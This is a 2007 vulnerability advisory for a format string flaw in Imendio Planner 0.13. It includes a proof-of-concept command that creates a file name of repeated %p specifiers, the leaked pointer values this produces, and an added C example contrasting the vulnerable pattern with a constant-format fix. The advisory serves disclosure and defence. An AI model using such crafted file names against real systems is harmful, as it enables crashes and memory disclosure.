IMENDIO PLANNER REMOTE FILENAME FORMAT STRING VULNERABILITY

By       : LoneEagle
E-mail   : king_purba@yahoo.co.uk
http://kandangjamur.net

Affected : IMENDIO PLANNER 0.13 PROJECT MANAGEMENT FEDORA 4.
Impact   : Application crash and possibly system access
From     : Remote
Severity : Moderately Critical

Description:
------------
Imendio Planner fails when it opens a file whose name contains format string specifiers. A remote attacker can exploit this vulnerability by creating a malicious file name that contains format string specifiers. A successful attack can be used to execute arbitrary code.

Demo :
----------
From a terminal/console shell:

$ touch /tmp/`perl -e 'print "%p"x20'`

- Now open Imendio Planner from the GNOME start menu, then press F3 to open a file.
- Select the file /tmp/%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
- When opening the file, Imendio Planner shows an error pop-up message. Yeah, format string error..

Error
Couldn't find a suitable file module for loading '/tmp/0x230x853c7780xb79822340xb78f9adc0xb78fb3200x8507c28(nil) 0x85213600x81248f80xbf9f02480x807fc640x81078000x8521360(nil) 0xb7929eec0x854b5c00x853c7780x854b5c00x844be200x8521360'

Analysis, PoC, and patch
------------------------------
I'm a bit lazy to analyse the code, or maybe I'm a bit lame too :)

Solution :
----------
Don't open files from untrusted sources.

(Last Edited 4/4/2007)
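
The advisory does not identify the faulty call, so the following is an added example, not Planner's code: it assumes the usual cause of this symptom, an error message that already contains the file name being passed as the format argument of a printf-style function, and shows that pattern beside the constant-format fix. All function names (dialog_text, error_text_unsafe, error_text_safe, count_conversions) are hypothetical.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#define MSG "Couldn't find a suitable file module for loading '%s'"

/* Hypothetical stand-in for a printf-style dialog call; writes into out. */
static int dialog_text(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Vulnerable pattern: the finished message is reused as the format string. */
int error_text_unsafe(char *out, size_t n, const char *filename)
{
    char msg[512];
    snprintf(msg, sizeof msg, MSG, filename);
    return dialog_text(out, n, msg);   /* each %p in the name reads a stray argument */
}

/* Hardened pattern: constant format, file name passed only as data. */
int error_text_safe(char *out, size_t n, const char *filename)
{
    return dialog_text(out, n, MSG, filename);
}

/* Audit helper: count the conversions printf would consume from s.
 * "%%" is a literal percent sign and a trailing lone '%' is ignored. */
int count_conversions(const char *s)
{
    int count = 0;
    for (; *s; s++)
        if (s[0] == '%' && s[1] != '\0' && *++s != '%')
            count++;
    return count;
}

int main(void)
{
    char out[256];
    const char *name = "/tmp/%p%p%p%p";   /* constructed sample name */
    error_text_safe(out, sizeof out, name);
    printf("%s (%d conversions in name)\n", out, count_conversions(name));
    return 0;
}
```

With the constant format the dialog text shows the file name exactly as it exists on disk, instead of the pointer values seen in the error message above.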